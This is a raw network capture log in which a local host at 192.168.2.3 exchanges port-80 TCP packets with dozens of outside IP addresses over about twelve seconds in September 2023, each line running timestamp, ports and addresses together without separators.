                                                                                                                                                                              Sep 15, 2023 07:26:30.628317118 CEST4986580192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:30.628567934 CEST4986580192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:30.628597021 CEST8049853210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.628645897 CEST4985380192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:30.712889910 CEST80498665.196.166.214192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.712975025 CEST4986680192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:30.715725899 CEST4986680192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:30.724854946 CEST8049865147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.739132881 CEST8049865147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.739200115 CEST4986580192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:30.740391970 CEST8049865147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.740520954 CEST4986580192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:30.757510900 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.758274078 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.758336067 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:30.760246038 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:30.866281986 CEST4980380192.168.2.3185.15.129.58
                                                                                                                                                                              Sep 15, 2023 07:26:30.896564960 CEST80498665.196.166.214192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.896594048 CEST80498665.196.166.214192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.896653891 CEST4986680192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:30.896682024 CEST4986680192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:30.934561014 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:30.934638977 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:30.935617924 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:30.969042063 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.063395977 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.088510036 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.088659048 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.088993073 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.089045048 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.110054016 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.110205889 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:31.111176968 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:31.154150009 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.154295921 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.154572010 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.208451033 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.208514929 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.208553076 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.245137930 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255460978 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255498886 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255536079 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255573034 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255575895 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.255577087 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.255609035 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255641937 CEST8049868172.67.150.80192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.255650997 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.255650997 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.255650997 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.255680084 CEST4986880192.168.2.3172.67.150.80
                                                                                                                                                                              Sep 15, 2023 07:26:31.285545111 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.285623074 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:31.286549091 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:31.461704969 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.461790085 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:31.803611040 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803656101 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803673983 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803694010 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803704977 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803733110 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803745031 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803769112 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803769112 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803807020 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803813934 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803843975 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803844929 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803879976 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803884029 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803917885 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803919077 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803953886 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.803953886 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.803992987 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.850637913 CEST4985780192.168.2.364.125.133.18
                                                                                                                                                                              Sep 15, 2023 07:26:31.923640966 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.923660040 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.923784971 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.923810959 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.927742958 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.927757978 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.927882910 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.927908897 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.936109066 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.936122894 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.936214924 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.936247110 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.944502115 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.944569111 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.944623947 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.944783926 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.953037977 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.953077078 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.953174114 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.953193903 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.961200953 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.961251974 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.961396933 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.961419106 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.969731092 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.969762087 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.969844103 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.969961882 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.978018045 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.978056908 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.978126049 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.978240013 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.986406088 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.986531973 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.986567974 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.986619949 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.994829893 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.994954109 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:31.995059013 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:31.995162964 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.043355942 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.043380022 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.043497086 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.043523073 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.047683001 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.047703981 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.047789097 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.047802925 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.055160999 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.055273056 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.055290937 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.055316925 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.062691927 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.062736034 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.062798977 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.062798977 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.069935083 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.070008039 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.070033073 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.070048094 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.077171087 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.077183008 CEST804986774.208.236.101192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.077306986 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.077306986 CEST4986780192.168.2.374.208.236.101
                                                                                                                                                                              Sep 15, 2023 07:26:32.334988117 CEST4981580192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:32.446122885 CEST8049846165.227.252.190192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.446223974 CEST4984680192.168.2.3165.227.252.190
                                                                                                                                                                              Sep 15, 2023 07:26:32.461914062 CEST804981939.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.461992025 CEST4981980192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:32.617449999 CEST4987280192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:32.871870995 CEST804987293.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:32.872033119 CEST4987280192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:32.872406006 CEST4987280192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:33.126328945 CEST804987293.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:33.126497030 CEST804987293.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:33.126569033 CEST4987280192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:33.334165096 CEST4987380192.168.2.396.91.204.114
                                                                                                                                                                              Sep 15, 2023 07:26:33.467576027 CEST804985269.163.239.62192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:33.467648983 CEST4985280192.168.2.369.163.239.62
                                                                                                                                                                              Sep 15, 2023 07:26:33.630081892 CEST4987480192.168.2.372.251.233.245
                                                                                                                                                                              Sep 15, 2023 07:26:33.873573065 CEST804987472.251.233.245192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:33.873825073 CEST4987480192.168.2.372.251.233.245
                                                                                                                                                                              Sep 15, 2023 07:26:33.874031067 CEST4987480192.168.2.372.251.233.245
                                                                                                                                                                              Sep 15, 2023 07:26:33.956701040 CEST804985672.44.93.236192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:33.956938028 CEST4985680192.168.2.372.44.93.236
                                                                                                                                                                              Sep 15, 2023 07:26:34.117398024 CEST804987472.251.233.245192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:34.117584944 CEST804987472.251.233.245192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:34.117602110 CEST804987472.251.233.245192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:34.117661953 CEST4987480192.168.2.372.251.233.245
                                                                                                                                                                              Sep 15, 2023 07:26:34.117676973 CEST4987480192.168.2.372.251.233.245
                                                                                                                                                                              Sep 15, 2023 07:26:34.118199110 CEST4987480192.168.2.372.251.233.245
                                                                                                                                                                              Sep 15, 2023 07:26:34.361510992 CEST804987472.251.233.245192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:34.629204035 CEST8049816202.254.236.40192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:34.629317999 CEST4981680192.168.2.3202.254.236.40
                                                                                                                                                                              Sep 15, 2023 07:26:35.077774048 CEST8049714172.67.140.52192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:35.077990055 CEST4971480192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:35.246140957 CEST4987680192.168.2.3172.67.152.88
                                                                                                                                                                              Sep 15, 2023 07:26:35.337481976 CEST8049876172.67.152.88192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:35.337601900 CEST4987680192.168.2.3172.67.152.88
                                                                                                                                                                              Sep 15, 2023 07:26:35.337949991 CEST4987680192.168.2.3172.67.152.88
                                                                                                                                                                              Sep 15, 2023 07:26:35.429261923 CEST8049876172.67.152.88192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:35.438654900 CEST8049876172.67.152.88192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:35.438738108 CEST4987680192.168.2.3172.67.152.88
                                                                                                                                                                              Sep 15, 2023 07:26:35.725646973 CEST4984080192.168.2.3198.100.146.220
                                                                                                                                                                              Sep 15, 2023 07:26:36.266978025 CEST4987780192.168.2.3208.91.197.46
                                                                                                                                                                              Sep 15, 2023 07:26:36.335038900 CEST4987380192.168.2.396.91.204.114
                                                                                                                                                                              Sep 15, 2023 07:26:36.358963013 CEST8049877208.91.197.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:36.359093904 CEST4987780192.168.2.3208.91.197.46
                                                                                                                                                                              Sep 15, 2023 07:26:36.359774113 CEST4987780192.168.2.3208.91.197.46
                                                                                                                                                                              Sep 15, 2023 07:26:36.451555967 CEST8049877208.91.197.46192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:36.466974020 CEST80498643.65.101.129192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:36.467200041 CEST4986480192.168.2.33.65.101.129
                                                                                                                                                                              Sep 15, 2023 07:26:37.850691080 CEST4985780192.168.2.364.125.133.18
                                                                                                                                                                              Sep 15, 2023 07:26:37.868644953 CEST8049843162.43.120.128192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:37.868767977 CEST4984380192.168.2.3162.43.120.128
                                                                                                                                                                              Sep 15, 2023 07:26:38.017132998 CEST8049839195.78.66.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:38.017282963 CEST4983980192.168.2.3195.78.66.50
                                                                                                                                                                              Sep 15, 2023 07:26:38.629384995 CEST4987880192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:38.876084089 CEST8049878206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:38.876221895 CEST4987880192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:38.876507044 CEST4987880192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:39.120457888 CEST8049878206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.120704889 CEST8049878206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.120733976 CEST8049878206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.120752096 CEST8049878206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.120794058 CEST4987880192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:39.120826006 CEST4987880192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:39.121332884 CEST4987880192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:39.350419044 CEST8049755208.97.178.138192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.365125895 CEST8049878206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.380532980 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:39.575520992 CEST8049879135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.575613976 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:39.576011896 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:39.771043062 CEST8049879135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.771079063 CEST8049879135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.771266937 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:39.794260025 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:39.989942074 CEST8049879135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:39.990020990 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:40.189424992 CEST4988080192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.287745953 CEST804988052.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.287856102 CEST4988080192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.288229942 CEST4988080192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.385843039 CEST804988052.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.385870934 CEST804988052.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.385941029 CEST4988080192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.385977030 CEST4988080192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.386754036 CEST4988080192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.413717985 CEST4988180192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.484263897 CEST804988052.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.511576891 CEST804988152.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.511694908 CEST4988180192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.512151003 CEST4988180192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.609220982 CEST804988152.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.609261036 CEST804988152.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.609301090 CEST4988180192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.609324932 CEST4988180192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.610153913 CEST4988180192.168.2.352.71.57.184
                                                                                                                                                                              Sep 15, 2023 07:26:40.617867947 CEST8049821170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.617938042 CEST4982180192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:40.707494020 CEST804988152.71.57.184192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:40.882203102 CEST4988280192.168.2.3217.19.237.54
                                                                                                                                                                              Sep 15, 2023 07:26:41.051841974 CEST8049882217.19.237.54192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.051959991 CEST4988280192.168.2.3217.19.237.54
                                                                                                                                                                              Sep 15, 2023 07:26:41.052443027 CEST4988280192.168.2.3217.19.237.54
                                                                                                                                                                              Sep 15, 2023 07:26:41.221781015 CEST8049882217.19.237.54192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.222729921 CEST8049882217.19.237.54192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.222795010 CEST4988280192.168.2.3217.19.237.54
                                                                                                                                                                              Sep 15, 2023 07:26:41.377028942 CEST4988380192.168.2.313.248.169.48
                                                                                                                                                                              Sep 15, 2023 07:26:41.466275930 CEST8049835213.186.33.17192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.466409922 CEST4983580192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:41.467907906 CEST804988313.248.169.48192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.467993021 CEST4988380192.168.2.313.248.169.48
                                                                                                                                                                              Sep 15, 2023 07:26:41.468399048 CEST4988380192.168.2.313.248.169.48
                                                                                                                                                                              Sep 15, 2023 07:26:41.559034109 CEST804988313.248.169.48192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.566442013 CEST804988313.248.169.48192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.566632986 CEST4988380192.168.2.313.248.169.48
                                                                                                                                                                              Sep 15, 2023 07:26:41.630857944 CEST804976969.163.218.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.744950056 CEST4988480192.168.2.3188.166.152.188
                                                                                                                                                                              Sep 15, 2023 07:26:41.926502943 CEST8049884188.166.152.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.926584959 CEST4988480192.168.2.3188.166.152.188
                                                                                                                                                                              Sep 15, 2023 07:26:41.926831007 CEST4988480192.168.2.3188.166.152.188
                                                                                                                                                                              Sep 15, 2023 07:26:41.970684052 CEST4988580192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:41.990360975 CEST8049879135.181.73.98192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:41.990746021 CEST4987980192.168.2.3135.181.73.98
                                                                                                                                                                              Sep 15, 2023 07:26:42.079247952 CEST804988513.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.079406023 CEST4988580192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:42.079715014 CEST4988580192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:42.101880074 CEST8049884188.166.152.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.103709936 CEST8049884188.166.152.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.103777885 CEST4988480192.168.2.3188.166.152.188
                                                                                                                                                                              Sep 15, 2023 07:26:42.188196898 CEST804988513.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.188504934 CEST804988513.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.188606977 CEST4988580192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:42.212614059 CEST4988580192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:42.242703915 CEST8049773147.154.0.23192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.242980003 CEST4977380192.168.2.3147.154.0.23
                                                                                                                                                                              Sep 15, 2023 07:26:42.279174089 CEST4988680192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:42.320979118 CEST804988513.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.321846962 CEST804988513.249.85.117192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.321937084 CEST4988580192.168.2.313.249.85.117
                                                                                                                                                                              Sep 15, 2023 07:26:42.334944963 CEST4987380192.168.2.396.91.204.114
                                                                                                                                                                              Sep 15, 2023 07:26:42.369997025 CEST804988623.227.38.74192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.370065928 CEST4988680192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:42.370271921 CEST4988680192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:42.461236000 CEST804988623.227.38.74192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.596823931 CEST804988623.227.38.74192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.596987009 CEST4988680192.168.2.323.227.38.74
                                                                                                                                                                              Sep 15, 2023 07:26:42.648669958 CEST4988780192.168.2.3211.1.226.67
                                                                                                                                                                              Sep 15, 2023 07:26:42.749444962 CEST4988880192.168.2.3208.109.214.162
                                                                                                                                                                              Sep 15, 2023 07:26:42.882611036 CEST4988980192.168.2.3213.186.33.17
                                                                                                                                                                              Sep 15, 2023 07:26:42.907927036 CEST8049888208.109.214.162192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:42.908045053 CEST4988880192.168.2.3208.109.214.162
